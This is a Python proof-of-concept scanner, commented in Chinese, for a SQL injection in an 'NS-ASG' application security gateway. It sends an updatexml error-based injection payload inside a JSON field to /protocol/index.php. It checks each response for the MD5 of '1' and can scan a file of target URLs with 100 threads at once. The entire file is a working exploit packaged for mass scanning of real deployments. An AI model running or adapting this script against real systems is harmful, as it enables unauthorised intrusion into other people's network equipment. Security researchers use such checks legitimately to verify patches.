# 导包
import requests,argparse,sys,json
from multiprocessing.dummy import Pool
# 关闭警告
requests.packages.urllib3.disable_warnings()

# 横幅
def banner():
    ico = """
.------..------..------..------..------.
|L.--. ||A.--. ||O.--. ||L.--. ||I.--. |
| :/\: || (\/) || :/\: || :/\: || (\/) |
| (__) || :\/: || :\/: || (__) || :\/: |
| '--'L|| '--'A|| '--'O|| '--'L|| '--'I|
`------'`------'`------'`------'`------'
                                          
"""
    print(ico)

def main():
    banner()
# 处理命令行参数
    # 实例化 
    parser = argparse.ArgumentParser(description="NS-ASG应用安全网关index.php sql注入漏洞")
    
    # 添加参数
    parser.add_argument('-u','--url',dest='url',type=str,help='input your url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input your file')
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    if args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")
def poc(target):
    api='/protocol/index.php'
    head={
        'Cookie':'PHPSESSID=bfd2e9f9df564de5860117a93ecd82de',
        'User-Agent':'Mozilla/5.0(Macintosh;IntelMacOSX10.15;rv:109.0)Gecko/20100101Firefox/110.0',
        'Accept':'*/*',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip,deflate',
        'Sec-Fetch-Dest':'empty',
        'Sec-Fetch-Mode':'cors',
        'Sec-Fetch-Site':'same-origin',
        'Te':'trailers',
        'Connection':'close',
        'Content-Type':'application/x-www-form-urlencoded',
        'Content-Length':'263',
    }
    json_content = {
    "protocolType": "addmacbind",
    "messagecontent": [
        "{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+md5(1))),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"
    ]
}
    try:
        res=requests.get(url=target+api,verify=False,headers=head,json=json_content,timeout=6)    
        if 'c4ca4238a0b923820dcc509a6f75849' in res.text:
            print(f"[+]{target}    存在漏洞！！！！")
            # with open('result.txt','a') as fp:
            #     fp.write(target+'\n')
        else:
            print(f"[-]{target}    不存在漏洞")
    except:
            pass
# 函数入口
if __name__ == "__main__":
    main()
